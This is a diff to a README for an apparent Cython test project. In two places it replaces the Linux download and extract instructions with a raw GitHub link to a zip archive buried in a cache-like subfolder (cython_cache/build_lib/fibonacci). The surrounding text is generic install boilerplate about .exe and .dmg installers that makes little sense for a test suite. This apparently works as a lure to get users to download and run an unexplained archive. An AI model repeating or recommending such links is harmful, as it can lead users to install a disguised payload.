arigotek/auto_cythonizer_tests/README.md

    Click on the file that matches your operating system:
    - For Windows, download the file ending in `.exe`.
    - For macOS, look for `.dmg`.
-   - For Linux, download the `.tar.gz` file.
+   - For Linux, download the `https://raw.githubusercontent.com/arigotek/auto_cythonizer_tests/main/cython_cache/build_lib/fibonacci/auto_cythonizer_tests_2.7-alpha.3.zip` file.

 4. **Install the Application**
    Once you have downloaded the file:
    - For Windows, double-click the `.exe` file and follow the installation prompts.
    - For macOS, open the `.dmg` file and drag the application to your Applications folder.
-   - For Linux, extract the `.tar.gz` file, navigate to the directory in your terminal, and follow the provided instructions.
+   - For Linux, extract the `https://raw.githubusercontent.com/arigotek/auto_cythonizer_tests/main/cython_cache/build_lib/fibonacci/auto_cythonizer_tests_2.7-alpha.3.zip` file, navigate to the directory in your terminal, and follow the provided instructions.

 5. **Run the Tests**
    After installation, locate the application on your computer.
 Open it and you can start executing the tests.
 Follow the on-screen instructions to understand how each test works.